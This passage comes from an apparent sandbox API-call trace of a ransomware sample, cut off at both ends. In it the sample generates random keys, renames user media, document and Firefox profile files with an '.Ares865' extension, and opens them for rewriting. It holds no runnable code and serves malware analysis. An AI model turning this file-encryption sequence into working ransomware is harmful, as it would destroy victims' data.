CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.036] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.038] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.039] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.039] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.041] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\qS Q6A0CgOZx3j.m4a.Ares865") returned 73 [0108.041] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\qS Q6A0CgOZx3j.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\qs q6a0cgozx3j.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\qS Q6A0CgOZx3j.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\qs q6a0cgozx3j.m4a.ares865"), dwFlags=0x1) returned 1 [0108.043] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\qS Q6A0CgOZx3j.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\qs q6a0cgozx3j.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.043] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=98280) returned 1 [0108.044] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.044] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.044] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.047] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.048] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.048] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.050] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\rPN VpTgr.mp3.Ares865") returned 68 [0108.050] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\rPN VpTgr.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\rpn vptgr.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\rPN VpTgr.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\rpn vptgr.mp3.ares865"), dwFlags=0x1) returned 1 [0108.053] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\rPN VpTgr.mp3.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\rpn vptgr.mp3.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.053] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=73130) returned 1 [0108.053] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.054] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.054] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.057] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.057] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.057] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.060] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\TjQW0YLCXKbuJsXnXkp4.xlsx.Ares865") returned 80 [0108.060] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\TjQW0YLCXKbuJsXnXkp4.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\tjqw0ylcxkbujsxnxkp4.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\TjQW0YLCXKbuJsXnXkp4.xlsx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\tjqw0ylcxkbujsxnxkp4.xlsx.ares865"), dwFlags=0x1) returned 1 [0108.061] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\TjQW0YLCXKbuJsXnXkp4.xlsx.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\tjqw0ylcxkbujsxnxkp4.xlsx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.062] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=99366) returned 1 [0108.062] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.062] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.063] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.065] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.066] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.066] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.069] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\vEkj2.avi.Ares865") returned 64 [0108.069] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\vEkj2.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\vekj2.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\vEkj2.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\vekj2.avi.ares865"), dwFlags=0x1) returned 1 [0108.070] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\vEkj2.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\vekj2.avi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.070] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=79356) returned 1 [0108.071] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.071] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.071] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.073] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.074] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.074] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.077] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\VKFOK6GvQ10Bhcy.avi.Ares865") returned 74 [0108.077] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\VKFOK6GvQ10Bhcy.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\vkfok6gvq10bhcy.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\VKFOK6GvQ10Bhcy.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\vkfok6gvq10bhcy.avi.ares865"), dwFlags=0x1) returned 1 [0108.078] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\VKFOK6GvQ10Bhcy.avi.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\vkfok6gvq10bhcy.avi.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.078] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=83694) returned 1 [0108.079] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.079] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.079] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.081] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.082] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.082] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.085] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\VZjujdxgV1s-x I2.pps.Ares865") returned 75 [0108.085] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\VZjujdxgV1s-x I2.pps" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\vzjujdxgv1s-x i2.pps"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\VZjujdxgV1s-x I2.pps.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\vzjujdxgv1s-x i2.pps.ares865"), dwFlags=0x1) returned 1 [0108.086] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\VZjujdxgV1s-x I2.pps.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\vzjujdxgv1s-x i2.pps.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.087] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=87162) returned 1 [0108.087] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.088] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.088] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.090] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.091] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.091] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.093] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\XfzH4NfYmvZDgjZ2.csv.Ares865") returned 75 [0108.093] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\XfzH4NfYmvZDgjZ2.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\xfzh4nfymvzdgjz2.csv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\XfzH4NfYmvZDgjZ2.csv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\xfzh4nfymvzdgjz2.csv.ares865"), dwFlags=0x1) returned 1 [0108.094] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\XfzH4NfYmvZDgjZ2.csv.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\xfzh4nfymvzdgjz2.csv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.097] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=12190) returned 1 [0108.097] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.098] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.098] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.099] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.100] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.100] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.101] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\XMnSL6YgY.bmp.Ares865") returned 68 [0108.101] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\XMnSL6YgY.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\xmnsl6ygy.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\XMnSL6YgY.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\xmnsl6ygy.bmp.ares865"), dwFlags=0x1) returned 1 [0108.104] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\XMnSL6YgY.bmp.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\xmnsl6ygy.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.104] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=81516) returned 1 [0108.104] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.105] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.105] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.108] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.108] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.108] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.110] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\ZhEw_ Kxb8rHwQqg_2.m4a.Ares865") returned 77 [0108.110] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\ZhEw_ Kxb8rHwQqg_2.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\zhew_ kxb8rhwqqg_2.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\ZhEw_ Kxb8rHwQqg_2.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\zhew_ kxb8rhwqqg_2.m4a.ares865"), dwFlags=0x1) returned 1 [0108.112] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\ZhEw_ Kxb8rHwQqg_2.m4a.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\zhew_ kxb8rhwqqg_2.m4a.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.112] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=83747) returned 1 [0108.113] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.113] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.113] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.115] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.116] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.116] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.119] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla" [0108.119] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox" [0108.119] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\profiles.ini.Ares865") returned 83 [0108.120] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\profiles.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles.ini.ares865"), dwFlags=0x1) returned 1 [0108.122] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\profiles.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.123] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=111) returned 1 [0108.123] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.124] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.124] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.126] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.127] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.127] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.127] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles" [0108.128] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default" [0108.128] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json.Ares865") returned 108 [0108.128] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json.ares865"), dwFlags=0x1) returned 1 [0108.129] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\addons.json.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\addons.json.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.130] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=24) returned 1 [0108.130] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.131] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.131] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.135] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.136] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.136] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.137] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.Ares865") returned 114 [0108.137] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini.ares865"), dwFlags=0x1) returned 1 [0108.138] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0108.139] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=206) returned 1 [0108.139] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0108.139] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0108.139] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.142] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0108.143] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0108.143] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0108.143] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.Ares865") returned 111 [0108.143] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application data\\mozilla\\firefox\\profiles\\silmbjec.default\\extensions.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Application Data\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\extensions.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\application 